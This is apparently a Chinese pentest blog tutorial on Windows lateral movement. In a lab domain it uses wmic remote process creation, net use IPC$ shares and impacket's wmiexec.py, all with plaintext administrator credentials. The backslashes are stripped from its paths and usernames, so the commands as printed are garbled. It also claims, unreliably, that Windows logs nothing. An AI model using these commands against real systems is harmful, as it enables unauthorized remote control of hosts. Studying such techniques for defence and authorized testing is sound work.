![45f1fa8860e3e4de752011257299ead5.png](https://i-blog.csdnimg.cn/blog_migrate/8c6b4e741bc946b339369381b488ef29.jpeg)
自从PsExec被杀毒软件监控之后,黑客们又开始转移到WMI上,通过渗透测试发现,使用wmiexec进行横向移动时,windows操作系统竟然无动于衷,没有做任何日志记录。于是,越来越多的APT高级持续性威胁,开始了对WMI进行攻击研究~
1、使用WMI远程命令执行
- win7域用户--> windows server 2012域用户(成功)
wmic /node:192.168.160.143 /user:HACKBIJIAdministrator /password:W2ngluoanquan process call create "cmd.exe /c ipconfig >c:ip.txt"
![4b5194e153614808c3be2c7b1132f1be.png](https://i-blog.csdnimg.cn/blog_migrate/bc58a42f77d13b250ff5e837a65ea85a.png)
- 去windows server 2012域用户的C盘下,可以发现生成的 ip.txt 文件
![07fd1925a3d28a69766678198ab05a58.png](https://i-blog.csdnimg.cn/blog_migrate/a6716463c536a7a0ed4e0a9b5e701f81.png)
- 建立
IPC$
(win7域用户--> windows server 2012域用户)
net use 192.168.160.143ipc$ "W2ngluoanquan" /user:HACKBIJIAdministrator
![2c110822217ea0dd58f42fdd29c4ffb9.png](https://i-blog.csdnimg.cn/blog_migrate/4ebeaf867f60137bae72a36f53722952.png)
- 获取ip.txt文件信息 (windows server 2012域用户)
type 192.168.160.143c$ip.txt
![8bca94506083f6c264071b8a71609d2e.png](https://i-blog.csdnimg.cn/blog_migrate/6f6a63651ec75ab11386640fff81e976.png)
2、impacket工具包中的wmiexec
- impacket的github官方地址
- kali --> windows server 2012 (成功)
- 获取远程windows系统的控制权
- 不需要输入域信息
- 进入impacket目录,先执行
pip install .
安装依赖 - 然后就可以轻松拿到远程windows server 2012系统的控制权了
python wmiexec.py Administrator:W2ngluoanquan@192.168.160.143
![e6ed3b7b6129484e051253e620e1092b.png](https://i-blog.csdnimg.cn/blog_migrate/7682d27b50977d476a179d4af89a16e8.jpeg)
本篇完~